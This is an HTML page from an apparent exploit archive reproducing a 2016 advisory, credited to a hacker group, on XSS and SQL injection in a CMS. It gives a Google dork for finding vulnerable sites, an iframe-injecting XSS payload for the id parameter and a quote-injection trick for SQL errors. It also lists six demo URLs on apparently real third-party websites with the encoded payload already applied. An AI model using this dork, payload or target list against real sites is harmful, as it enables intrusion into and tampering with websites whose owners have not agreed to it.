<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-36</title>
    </head>
    <body>
        <center>
                <a  href="exploit-36" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
###########################

# parsclick CMS Xss And Sql Injection Vulnerability

###########################

* Title : parsclick CMS Xss And Sql Injection Vulnerability
* date : 5/7/2016
* Google Dork : intext:&quot;طراحی و میزبانی: رسانه پرداز پارس&quot; inurl:id=
* Exploit Author : Guardiran Security Team
* Website : guardiran.org
* Vendor HomePage : http://parsmedia.co.ir/
* Version : All Version
* Tested On : Kali Linux w3af / Windows 8.1 Mozila FireFox

Hello Guys.
This Is A Xss Vulnerability.
In This CMS We Can Run Javascript Code In SearchBox.
In This CMS When We Run JavaCode Give Me A MYsql Error . In This Mean That This CMS Is vulnerable .
Page vulnerable : [ [Patch].php?id= ]
Payload : '&gt;&lt;iframe src=\&quot;http://guardiran.org/forums\&quot; width=\&quot;450\&quot; height=\&quot;200\&quot;&gt;&lt;/iframe&gt;

Also This CMS Have SQL Injection Bug.
Find User [ Id= ] And Put ' or &quot; After Id.

Demo :

http://www.mtes.ir/products/category.php?id=72%27%3E%3Ciframe%20src=\%22http://guardiran.org/forums\%22%20width=\%22450\%22%20height=\%22200\%22%3E%3C/iframe%3E
http://mahyasaze.com/portfolio/cat.php?id=3%27%3E%3Ciframe%20src=\%22http://guardiran.org/forums\%22%20width=\%22450\%22%20height=\%22200\%22%3E%3C/iframe%3E
http://www.chantiq.com/fa/products/product.php?id=161%27%3E%3Ciframe%20src=\%22http://guardiran.org/forums\%22%20width=\%22450\%22%20height=\%22200\%22%3E%3C/iframe%3E
http://ariamenswear.com/generate_page/?id=15%27%3E%3Ciframe%20src=\%22http://guardiran.org/forums\%22%20width=\%22450\%22%20height=\%22200\%22%3E%3C/iframe%3E
http://pouyeshchap.com/generate_page/?id=15%27%3E%3Ciframe%20src=\%22http://guardiran.org/forums\%22%20width=\%22450\%22%20height=\%22200\%22%3E%3C/iframe%3E
http://www.avam-mk.com/fa/products/category.php?id=15%27%3E%3Ciframe%20src=\%22http://guardiran.org/forums\%22%20width=\%22450\%22%20height=\%22200\%22%3E%3C/iframe%3E


* Special Tnx : cod3!nj3ct!0n , REX , alizombie , DR.GrYgHoN , MR.IMAN , reza attacker
* Discovered By : MR.IMAN ~~ demon.hacker37@yahoo.com ~~ telegram.me/MRBLACK
* We Are Guardiran Security Team        </pre>
    </body>
</html>